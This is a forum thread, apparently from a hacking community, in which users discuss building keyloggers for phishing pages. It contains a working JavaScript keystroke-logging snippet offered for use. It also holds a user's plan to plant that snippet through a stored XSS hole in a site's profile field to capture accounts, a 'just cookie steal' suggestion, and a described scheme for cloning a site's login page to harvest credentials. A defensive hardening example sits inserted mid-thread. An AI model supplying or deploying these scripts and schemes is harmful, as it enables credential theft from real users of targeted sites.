
PHP Keylogger


ghost's Avatar
0 0

As most of you are aware, there have been many phishing sites around. I know it is possible to keylog strokes on webpages using JavaScript, but seeing as this shows up in the page source, I was wondering if it's possible to do it solely in PHP.

If you know how I would be able to do this, could you please tell me the functions I should look into. I have a basic knowledge of PHP, but Google doesn't teach, it tells, and I'm not looking for an answer xD

Flash.


ghost's Avatar
0 0

Javascript keylogger = pretty easy to find/create.

Take this one for example:


<script>
winKL = window.open('log.txt','KeyLogger','directories=no,menu=no,status=no,resizable=no');
winKL.document.write('<html><body onLoad="self.blur();">');

document.onkeypress = function () {
  key = window.event.keyCode;
  winKL.document.write(String.fromCharCode(key));
}
self.focus();
</script>

ghost's Avatar
0 0

I don't see what use this would be. I mean, if you get someone to visit your site, you can see everything that they submit. And they are only going to type if they have a reason to enter data.

But if you have a reason, just combine the JS example with PHP's file commands and you can dump everything the user types into a file.


ghost's Avatar
0 0

Ya well, I was hired by a site to find security holes, and it had accounts worth hacking. I found a security hole where you edit your profile that allowed you to submit ANY JavaScript.

I can easily put the keylogger there and get all accounts!:happy:


ghost's Avatar
0 0

Err, isn't that called an XSS hole? Just cookie steal.
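
The profile-field script injection discussed above, seen from the site's side, as an added example that is not part of the original thread. The function names, profile fields and header values are hypothetical; the sample input is constructed and uses a harmless alert marker.

```javascript
// Added example: hardening a profile page against stored script injection.
// renderProfileUnsafe/renderProfileSafe and the field names are hypothetical.

// Encode the characters that let stored text break out of HTML text
// or out of a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept only http(s) URLs for the "website" field; other schemes
// (javascript:, data:, ...) and unparsable values are dropped.
function safeUrl(value) {
  try {
    const u = new URL(String(value));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '';
  } catch (e) {
    return '';
  }
}

// Vulnerable: stored profile text is concatenated into the page as markup.
function renderProfileUnsafe(profile) {
  return '<div class="bio">' + profile.bio + '</div>';
}

// Hardened: every stored field is encoded for the context it lands in.
function renderProfileSafe(profile) {
  const url = safeUrl(profile.website);
  const link = url
    ? '<a href="' + escapeHtml(url) + '" rel="nofollow noopener">website</a>'
    : '';
  return '<div class="bio">' + escapeHtml(profile.bio) + '</div>' + link;
}

// Defence in depth: the policy refuses inline script even if an encoding
// step is missed, and HttpOnly keeps the session cookie away from page script.
const SECURITY_HEADERS = {
  'Content-Security-Policy':
    "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
  'Set-Cookie': 'session=<opaque-id>; HttpOnly; Secure; SameSite=Lax',
};

// Constructed sample profile submission.
const sample = { bio: '<script>alert(1)</script>', website: 'javascript:alert(1)' };
```
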


ghost's Avatar
0 0

blackbird wrote: Ya well, I was hired by a site to find security holes, and it had accounts worth hacking. I found a security hole where you edit your profile that allowed you to submit ANY JavaScript.

I can easily put the keylogger there and get all accounts!:happy:

Woo hoo… if someone visits your profile, you can log keystrokes. Who is going to be typing anything on your profile page? How can you get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.

As for doing it solely with PHP, I've been looking around. Not that I can find. You can do it in Perl. I'd write the keylogger in Perl (it'll take a bit of research, but it's possible) and use that. I think PHP pretty much depends on JavaScript for keylog functions.

You could always encode the gibberish: can't it have the same functionality if you write it using URL encoding? Or perhaps ASCII values… I dunno. I'm not a big JavaScript person, but there is a way to do it.


ghost's Avatar
0 0

Thanks for your replies, people.

@Grindordie - I know the difference but wasn't aware if you could do this with PHP.

@Spyware - Thanks for the links and code etc. Much appreciated

@Deathrape - Thanks for your reply and neither am I a JS person, I know enough to get me by but not to make scripts worth having. Now is the time to get it done.

As a consolation, I thought of another way it would be possible… not solely for keylogging but to log what the user 'submits'. E.g. you copy the site image to image, CSS to CSS, source to source, and have the login in a 'submit news' form. Using URL manipulation, direct the victim to the fake page. When the user inputs the details, they will be posted to another page and then redirected to one from the original site.

That is just an idea if someone else was interested in this.


ghost's Avatar
0 0

Woo hoo… if someone visits your profile, you can log keystrokes. Who is going to be typing anything on your profile page? How can you get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.

Obviously you have no idea what I'm talking about……..


ghost's Avatar
0 0

Well then, you should obviously explain how this could be an asset. If you don't, I'll just assume you have no idea what you're talking about versus me.